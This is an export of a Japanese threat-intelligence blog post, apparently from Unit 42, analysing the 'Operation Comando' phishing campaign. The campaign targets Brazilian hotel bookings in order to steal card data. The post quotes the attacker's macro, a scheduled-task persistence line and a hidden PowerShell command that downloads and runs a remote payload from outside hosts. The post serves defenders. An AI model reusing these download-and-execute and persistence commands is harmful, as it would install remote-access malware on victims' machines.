{"id":101359,"date":"2019-03-12T12:00:14","date_gmt":"2019-03-12T19:00:14","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=101359\/"},"modified":"2019-11-25T21:55:30","modified_gmt":"2019-11-26T05:55:30","slug":"operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business","status":"publish","type":"post","link":"https:\/\/unit42.paloaltonetworks.com\/ja\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/","title":{"rendered":"Comando\u4f5c\u6226: \u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u7a83\u53d6\u30d3\u30b8\u30cd\u30b9\u3092\u683c\u5b89\u3067\u52b9\u679c\u7684\u306b\u904b\u55b6\u3059\u308b\u65b9\u6cd5"},"content":{"rendered":"<h2>\u6982\u8981<\/h2>\n<p>2018\u5e7412\u6708\u3001Palo Alto Networks\u8105\u5a01\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u8abf\u67fb\u30c1\u30fc\u30e0Unit 42\u306e\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u306f\u9032\u884c\u4e2d\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u78ba\u8a8d\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306f\u30db\u30b9\u30d4\u30bf\u30ea\u30c6\u30a3\u30bb\u30af\u30bf\u3001\u3068\u304f\u30db\u30c6\u30eb\u306e\u4e88\u7d04\u306b\u91cd\u70b9\u3092\u7f6e\u3044\u3066\u3044\u307e\u3057\u305f\uff61\u6700\u521d\u306e\u5206\u6790\u3067\u306f\u3068\u304f\u306b\u76ee\u65b0\u3057\u3044\u30c6\u30af\u30cb\u30c3\u30af\u3084\u9ad8\u5ea6\u306a\u30c6\u30af\u30cb\u30c3\u30af\u306f\u898b\u3064\u304b\u308a\u307e\u305b\u3093\u3067\u3057\u305f\u304c\u3001\u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u898b\u305b\u308b\u57f7\u62d7\u3055\u306b\u8208\u5473\u3092\u5f15\u304b\u308c\u307e\u3057\u305f\uff61<\/p>\n<p>\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u306e\u75d5\u8de1\u3092\u305f\u3069\u308a\u3001\u305d\u3053\u304b\u3089\u3053\u306e\u653b\u6483\u8005\u304c\u6b8b\u3057\u305f\u60c5\u5831(C2 \u4e0a\u306e\u95b2\u89a7\u53ef\u80fd\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u3001\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u306e\u30e1\u30bf\u30c7\u30fc\u30bf\u3001\u30d0\u30a4\u30ca\u30ea\u306e\u7279\u6027\u306a\u3069)\u306b\u63a2\u7d22\u3092\u5e83\u3052\u307e\u3057\u305f\u3002\u3053\u3053\u304b\u3089\u30ab\u30b9\u30bf\u30e0\u30e1\u30a4\u30c9\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u304c\u898b\u3064\u304b\u308a\uff64\u3053\u308c\u3092 \u300cCapturaTela\u300d\u3068\u540d\u4ed8\u3051\u307e\u3057\u305f\u3002\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u30d5\u30a1\u30df\u30ea\u3092\u767a\u898b\u3057\u305f\u3053\u3068\u3067\u3001\u306a\u305c\u30db\u30c6\u30eb\u306e\u4e88\u7d04\u304c\u4e3b\u306a\u653b\u6483\u30d9\u30af\u30bf\u30fc\u3068\u3057\u3066\u57f7\u62d7\u306b\u72d9\u308f\u308c\u3066\u3044\u308b\u306e\u304b\u3068\u3044\u3046\u7406\u7531\u304c\u5206\u304b\u308a\u307e\u3057\u305f\uff61\u3064\u307e\u308a\uff64\u9867\u5ba2\u304b\u3089\u306e\u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u60c5\u5831\u7a83\u53d6\u3092\u72d9\u3063\u3066\u3044\u305f\u306e\u3067\u3059\u3002<\/p>\n<p>\u79c1\u305f\u3061\u306f\u3053\u306e\u653b\u6483\u8005\u306e\u30d7\u30ed\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u307e\u3057\u305f\u3002\u305d\u306e\u7d50\u679c\u3001\u653b\u6483\u8005\u304c\u3068\u308b\u914d\u4fe1\u30e1\u30ab\u30cb\u30ba\u30e0\u306e\u307b\u304b\u306b\uff64RAT(\u30ea\u30e2\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u30c4\u30fc\u30eb)\u3084\u60c5\u5831\u7a83\u53d6\u7528\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306a\u3069\u306e\u5e38\u7528\u30c4\u30fc\u30eb\u306b\u3064\u3044\u3066\u5224\u660e\u3057\u307e\u3057\u305f\uff61\u5f7c\u3089\u306f\u305d\u3046\u3057\u305f\u30c4\u30fc\u30eb\u3092GitHub\u30ea\u30dd\u30b8\u30c8\u30ea\u306b\u3042\u308b\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u30c4\u30fc\u30eb\u3084\u30a2\u30f3\u30c0\u30fc\u30b0\u30e9\u30a6\u30f3\u30c9\u30d5\u30a9\u30fc\u30e9\u30e0\u304b\u3089\u5165\u624b\u3057\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<p>\u7686\u3055\u3093\u306f\uff64\u653b\u6483\u8005\u304c\u30af\u30ec\u30b8\u30c3\u30c8\u30ab\u30fc\u30c9\u7a83\u53d6\u4e8b\u696d\u3092\u683c\u5b89\u3067\u52b9\u679c\u7684\u306b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u3092\u8abf\u67fb\u3057\u3066\u3044\u308b\u3068\u3053\u308d\u904b\u55b6\u3059\u308b\u65b9\u6cd5\u306b\u3064\u3044\u3066\u7591\u554f\u306b\u601d\u3063\u305f\u3053\u3068\u306f\u3042\u308a\u307e\u3059\u304b\uff61\u3060\u3068\u3059\u308c\u3070\u300cComando\u4f5c\u6226\u300d\u306b\u3064\u3044\u3066\u305c\u3072\u304a\u8aad\u307f\u304f\u3060\u3055\u3044\u3002<\/p>\n<h2>\u653b\u6483\u8005\u306e\u914d\u4fe1\u30e1\u30ab\u30cb\u30ba\u30e0<\/h2>\n<p>\u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u30c6\u30ec\u30e1\u30c8\u30ea\u3067\u306f\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u304c\u4e3b\u306a\u914d\u4fe1\u30e1\u30ab\u30cb\u30ba\u30e0\u3068\u3057\u3066\u7279\u5b9a\u3055\u308c\u30012018\u5e748\u6708\u306b\u6700\u521d\u306e\u95a2\u9023\u30b5\u30f3\u30d7\u30eb\u304c\u914d\u4fe1\u3055\u308c\u305f\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u653b\u6483\u8005\u304c\u3088\u304f\u4f7f\u7528\u3059\u308b\u30c8\u30d4\u30c3\u30af\u306f\u65c5\u884c\u306e\u4e88\u7d04\u3084\u30d0\u30a6\u30c1\u30e3\u30fc\u306b\u95a2\u9023\u3057\u305f\u3082\u306e\u3067\u3001\u4e3b\u306b\u30d6\u30e9\u30b8\u30eb\u4eba\u3092\u5bfe\u8c61\u306b\u3057\u3066\u3044\u307e\u3059\u3002\u88681\u306f\u3001\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u4e2d\u306b\u898b\u3064\u304b\u3063\u305f\u4ee3\u8868\u7684\u306a\u4ef6\u540d\u3068\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d\u306e\u4ee3\u8868\u7684\u306a\u30ea\u30b9\u30c8\u3067\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>\u30e1\u30fc\u30eb\u306e\u4ef6\u540d<\/strong><\/td>\n<td><strong>\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Reserva para tres quartos<\/td>\n<td>\"Ficha cadastral Leticia Ferreira Mendes.ppam\", \"Ficha cadastral Jacinto Mendes da Silva.ppam\", \"Ficha cadastral Marcos Portela Correa.ppam\", \"Ficha cadastral Francisco Prado.ppam\"<\/td>\n<\/tr>\n<tr>\n<td>Reserva Veirano Advogador<\/td>\n<td>Roominglist Veirano Advogados .docx<\/td>\n<\/tr>\n<tr>\n<td>Corrigir data da reserva para o dia 03<\/td>\n<td>Booking \u2013 Dados da Reserva.docx<\/td>\n<\/tr>\n<tr>\n<td>Voucher para reserva<\/td>\n<td>Voucher para reserva 02.docx<\/td>\n<\/tr>\n<tr>\n<td>Reserva<\/td>\n<td>Voucher de Reserva ADRIANA MILLER RODRIGUES.ppa<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u88681\u3053\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u4ee3\u8868\u3059\u308b\u96fb\u5b50\u30e1\u30fc\u30eb\u306e\u4ef6\u540d\u3068\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb\u540d<\/p>\n<p>\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u60aa\u610f\u306e\u3042\u308b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u3092\u8abf\u67fb\u3057\u305f\u3068\u3053\u308d\u3001\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30e1\u30bf\u30c7\u30fc\u30bf\u306b\u8208\u5473\u6df1\u3044\u4e00\u8cab\u6027\u304c\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u4f5c\u6210\u8005\u306f\u5fb9\u5e95\u3057\u3066\u982d\u5b57\u8a9e\u300cCDT Original\u300d\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u306e\u3067\u3059(\u8a73\u7d30\u306f\u56f31\u3067\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044)\u3002<\/p>\n<figure id=\"attachment_101360\" aria-describedby=\"caption-attachment-101360\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101360 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-172-1024x878.png\" alt=\"\u56f31 \u60aa\u610f\u306e\u3042\u308b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u306e\u30e1\u30bf\u30c7\u30fc\u30bf\u30b5\u30f3\u30d7\u30eb\" width=\"1024\" height=\"878\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-172-1024x878.png 1024w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-172-300x257.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-172-768x658.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-172-900x772.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-172-370x317.png 370w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-172.png 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-101360\" class=\"wp-caption-text\">\u56f31 \u60aa\u610f\u306e\u3042\u308b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u306e\u30e1\u30bf\u30c7\u30fc\u30bf\u30b5\u30f3\u30d7\u30eb<\/figcaption><\/figure>\n<p>\u653b\u6483\u8005\u306f\u591a\u304f\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u898b\u3089\u308c\u308b\u4e00\u822c\u7684\u306a\u65b9\u6cd5\u3092\u8907\u6570\u5229\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u305f\u3068\u3048\u3070\uff64MSHTA\u304c\u5b9f\u884c\u3059\u308b\u30ea\u30e2\u30fc\u30c8\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5916\u90e8\u53c2\u7167\u3059\u308b\u3053\u3068\u306a\u3069\u3067\u3059\uff61\u3053\u306e\u30a2\u30d7\u30ed\u30fc\u30c1\u306e\u304a\u304b\u3052\u3067\u3001\u653b\u6483\u8005\u306f\u81ea\u8eab\u306e\u6d3b\u52d5\u306b\u4f7f\u3046\u30c4\u30fc\u30eb\u3084\u30ea\u30bd\u30fc\u30b9\u3092\u8907\u6570\u898b\u3064\u3051\u3089\u308c\u307e\u3059\uff61\u540c\u6642\u306b\u30a2\u30ca\u30ea\u30b9\u30c8\u306b\u3088\u308b\u30a2\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\uff64\u8ffd\u8de1\u3092\u3088\u308a\u56f0\u96e3\u306b\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u89b3\u6e2c\u3055\u308c\u305f\u65b9\u6cd5\u306e\u306a\u304b\u3067\u3082\u3063\u3068\u3082\u4e00\u822c\u7684\u306a\u7d44\u307f\u5408\u308f\u305b\u3092\u56f32\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_101362\" aria-describedby=\"caption-attachment-101362\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101362 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-173-1024x353.png\" alt=\"\u56f32 \u8907\u6570\u306e\u914d\u4fe1\u30e1\u30ab\u30cb\u30ba\u30e0\" width=\"1024\" height=\"353\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-173-1024x353.png 1024w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-173-786x271.png 786w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-173-768x265.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-173-300x103.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-173-900x310.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-173-370x128.png 370w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-173.png 1253w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-101362\" class=\"wp-caption-text\">\u56f32 \u8907\u6570\u306e\u914d\u4fe1\u30e1\u30ab\u30cb\u30ba\u30e0<\/figcaption><\/figure>\n<p>2018\u5e7412\u6708\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u914d\u4fe1\u3055\u308c\u305f\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u30b5\u30f3\u30d7\u30eb\u3068\u3057\u3066\u898b\u3066\u307f\u307e\u3057\u3087\u3046\uff61\u3053\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u306b\u6dfb\u4ed8\u3055\u308c\u3066\u3044\u305f\u30d5\u30a1\u30a4\u30eb\u306f\u4f1a\u8b70\u5ba4\u30ea\u30b9\u30c8(SHA256: ac70d15106cc368c571c3969c456778b494d62c5319)\u3092\u507d\u88c5\u3057\u3066\u3044\u3066\uff64\u56f32\u306b\u793a\u3057\u305f\u30d7\u30ed\u30bb\u30b9\u306e\u3072\u3068\u3064\u3092\u4f7f\u3063\u3066\u914d\u4fe1\u3055\u308c\u3066\u3044\u307e\u3057\u305f\uff61\u56f33\u306b\u8a18\u8f09\u3057\u305f\u306e\u304c\u305d\u306e\u8a73\u7d30\u306a\u30d7\u30ed\u30bb\u30b9\u3067\u3059\uff61<\/p>\n<figure id=\"attachment_101364\" aria-describedby=\"caption-attachment-101364\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101364 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-174-1024x218.png\" alt=\"\u56f33 2018\u5e7412\u6708\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u306e\u914d\u4fe1\u30b5\u30f3\u30d7\u30eb\" width=\"1024\" height=\"218\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-174-1024x218.png 1024w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-174-300x64.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-174-768x164.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-174-900x192.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-174-370x79.png 370w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-174.png 1172w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-101364\" class=\"wp-caption-text\">\u56f33 2018\u5e7412\u6708\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u306e\u914d\u4fe1\u30b5\u30f3\u30d7\u30eb<\/figcaption><\/figure>\n<p>\u60aa\u610f\u306e\u3042\u308b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u306b\u306f\u3001MSHTA\u3092\u4f7f\u7528\u3057\u3066\u30ea\u30e2\u30fc\u30c8\u306b\u30db\u30b9\u30c8\u3055\u308c\u305f\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3059\u308b\u5358\u7d14\u306a\u30de\u30af\u30ed\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<pre class=\"\">Public Sub Auto_Open()\r\n   var0 = \"MSHTA https:\/\/bit[.]ly\/2QXNTHi\"\r\n   Var = var0\r\n   Shell (Var)\r\nEnd Sub<\/pre>\n<p>\u30e9\u30f3\u30c7\u30a3\u30f3\u30b0\u7528URL\u306f\u6b21\u306eURL\u306b\u89e3\u6c7a\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">hxxps:\/\/internetexplorer200[.]blogspot[.]com\/<\/span><\/p>\n<p>bit.ly\u4e0a\u306eURL\u77ed\u7e2e\u30ea\u30f3\u30af\u306e\u7d71\u8a08\u306f\u5f0a\u793e\u306e\u30c6\u30ec\u30e1\u30c8\u30ea\u3067\u306e\u89b3\u6e2c\u5185\u5bb9\u3092\u88cf\u4ed8\u3051\u308b\u3082\u306e\u3067\u3057\u305f\uff61\u56f34\u306e\u300c12\u670827\u65e5\u304b\u308928\u65e5\u306b\u304b\u3051\u3066\u306eBit.ly\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u5206\u5e03\u300d\u304b\u3089\u3082\u5206\u304b\u308b\u3068\u304a\u308a\uff64\u653b\u6483\u8005\u306f\u4e3b\u306b\u30d6\u30e9\u30b8\u30eb\u3092\u30bf\u30fc\u30b2\u30c3\u30c8\u3068\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_101366\" aria-describedby=\"caption-attachment-101366\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101366 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-175-1024x702.png\" alt=\"\u56f34 12\u670827\u65e5\u304b\u308928\u65e5\u306b\u304b\u3051\u3066\u306eBit.ly\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u5206\u5e03\" width=\"1024\" height=\"702\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-175-1024x702.png 1024w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-175-300x206.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-175-768x527.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-175-900x617.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-175-370x254.png 370w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-175.png 1098w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-101366\" class=\"wp-caption-text\">\u56f34 12\u670827\u65e5\u304b\u308928\u65e5\u306b\u304b\u3051\u3066\u306eBit.ly\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u306e\u5206\u5e03<\/figcaption><\/figure>\n<p>MSHTA\u306f\u3001\u3054\u304f\u5358\u7d14\u306a\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u4f7f\u7528\u3057\u3066\u30a8\u30f3\u30b3\u30fc\u30c9\/\u96e3\u8aad\u5316\u3055\u308c\u305fVBScript\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u5b9f\u884c\u3057\u307e\u3059(\u30b3\u30fc\u30c9\u5168\u4f53\u306b\u30dd\u30eb\u30c8\u30ac\u30eb\u8a9e\u306e\u5358\u8a9e\u304c\u3042\u308b\u3053\u3068\u306b\u6ce8\u610f\u3057\u3066\u304f\u3060\u3055\u3044)\u3002<\/p>\n<figure id=\"attachment_101368\" aria-describedby=\"caption-attachment-101368\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101368 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-176-1024x462.png\" alt=\"\u56f35 MSHTA\u3092\u4ecb\u3057\u3066\u5b9f\u884c\u3055\u308c\u308b\u7b2c1\u6bb5\u968e\u306eVBScript\u30b3\u30fc\u30c9\" width=\"1024\" height=\"462\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-176-1024x462.png 1024w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-176-300x135.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-176-768x346.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-176-900x406.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-176-370x167.png 370w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-176.png 1278w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-101368\" class=\"wp-caption-text\">\u56f35 MSHTA\u3092\u4ecb\u3057\u3066\u5b9f\u884c\u3055\u308c\u308b\u7b2c1\u6bb5\u968e\u306eVBScript\u30b3\u30fc\u30c9<\/figcaption><\/figure>\n<p>\u3053\u308c\u306b\u3088\u308a\u3001\u6b21\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af\u304c\u30b7\u30b9\u30c6\u30e0\u5185\u306b\u4f5c\u6210\u3055\u308c\u3001\u305d\u3053\u3067\u5225\u306e\u30ea\u30e2\u30fc\u30c8\u30ed\u30b1\u30fc\u30b7\u30e7\u30f3\u304b\u3089MSHTA\u3092\u4ecb\u3057\u3066\u65b0\u3057\u3044\u7b2c2\u6bb5\u968e\u306eVB\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u3082\u30b3\u30e1\u30f3\u30c8\u306b\u300cCDT\u300d\u3078\u306e\u8a00\u53ca\u304c\u898b\u3089\u308c\u308b\u3053\u3068\u306b\u6ce8\u76ee\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n<pre>\"set shhh = CreateObject(\\\"WScript.Shell\\\")\\r\\n\u00a0\u00a0 Dim var1\\r\\n var1 = \\\"cmd.exe \/c SchTasks \/Create \/sc MINUTE \/MO 240 \/TN AdobeUpdateSD \/TR \\\"\\\".exe https:\/\/minhacasaminhavidacdt.blogspot[.]com\/\\\"\\r\\nshhh.run var1, vbHide\\r\\n\"\r\n<\/pre>\n<figure id=\"attachment_101370\" aria-describedby=\"caption-attachment-101370\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-101370 size-large lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-177-1024x348.png\" alt=\"\u56f36 \u7b2c2\u6bb5\u968e\u306eVB\u30b9\u30af\u30ea\u30d7\u30c8\" width=\"1024\" height=\"348\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-177-1024x348.png 1024w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-177-300x102.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-177-768x261.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-177-900x306.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-177-370x126.png 370w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/word-image-177.png 1431w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-101370\" class=\"wp-caption-text\">\u56f36 \u7b2c2\u6bb5\u968e\u306eVB\u30b9\u30af\u30ea\u30d7\u30c8<\/figcaption><\/figure>\n<p>\u3053\u306e\u7b2c2\u6bb5\u968e\u306eVB\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u3001PowerShell\u30ea\u30d5\u30ec\u30af\u30b7\u30e7\u30f3\u3092\u4ecb\u3057\u3066\u6700\u7d42\u7684\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30e1\u30e2\u30ea\u306b\u30ed\u30fc\u30c9\u3057\u3001GIF\u306e\u62e1\u5f35\u5b50\u3092\u6301\u3064\u30d5\u30a1\u30a4\u30eb\u304b\u3089\u30d0\u30a4\u30ca\u30ea\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u53d6\u5f97\u3057\u307e\u3059\u3002<\/p>\n<pre>\"CreateObject(\\\"Wscript.Shell\\\").run\u00a0 \\\"cmd.exe \/c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [Reflection.Assembly]::Load([Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http:\/\/achoteis.com[.]br\/images\/64.gif'))).EntryPoint.Invoke($null,$null)\\\"\\r\\n\"\r\n<\/pre>\n<p>\u3053\u306e\u30b1\u30fc\u30b9\u3067\u914d\u4fe1\u3055\u308c\u3066\u3044\u308b\u6700\u5f8c\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u5546\u7528\u30c4\u30fc\u30ebRevenge Remote Access Trojan(RAT)\u3067\u3059\u3002\u3053\u306e\u30c4\u30fc\u30eb\u3092\u4f7f\u3046\u3053\u3068\u3067\uff64\u60c5\u5831\u7a83\u53d6\u304c\u5bb9\u6613\u306b\u306a\u308a\u307e\u3059\uff61<\/p>\n<h2>\u30a4\u30f3\u30d5\u30e9\u5206\u6790<\/h2>\n<p>\u30a4\u30f3\u30d5\u30e9\u306e\u30ec\u30d9\u30eb\u3092\u898b\u3066\u307f\u308b\u3068\uff64\u653b\u6483\u8005\u306fDuckDNS\u3001WinCo\u3001No-IP\u306a\u3069\u306e\u52d5\u7684DNS(DDNS)\u30b5\u30fc\u30d3\u30b9\u3092\u5229\u7528\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u591a\u304f\u306f\u7121\u6599\u30a2\u30ab\u30a6\u30f3\u30c8\u3092\u63d0\u4f9b\u3057\u3066\u3044\u308b\u306e\u3067\uff64\u653b\u6483\u8005\u304c\u30a4\u30f3\u30d5\u30e9\u306b\u304b\u3051\u308b\u6295\u8cc7\u3092\u524a\u6e1b\u3057\u3066\u304f\u308c\u307e\u3059\u3002\u4f7f\u7528\u4e2d\u306e\u30c9\u30e1\u30a4\u30f3\u30b5\u30f3\u30d7\u30eb\u3092\u88682\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>\u52d5\u7684DNS\u30c9\u30e1\u30a4\u30f3<\/strong><\/td>\n<\/tr>\n<tr>\n<td>systenfailued.ddns[.]com[.]br<\/td>\n<\/tr>\n<tr>\n<td>office365update[.]duckdns[.]org<\/td>\n<\/tr>\n<tr>\n<td>cdtoriginal[.]ddns[.]net<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>\u88682 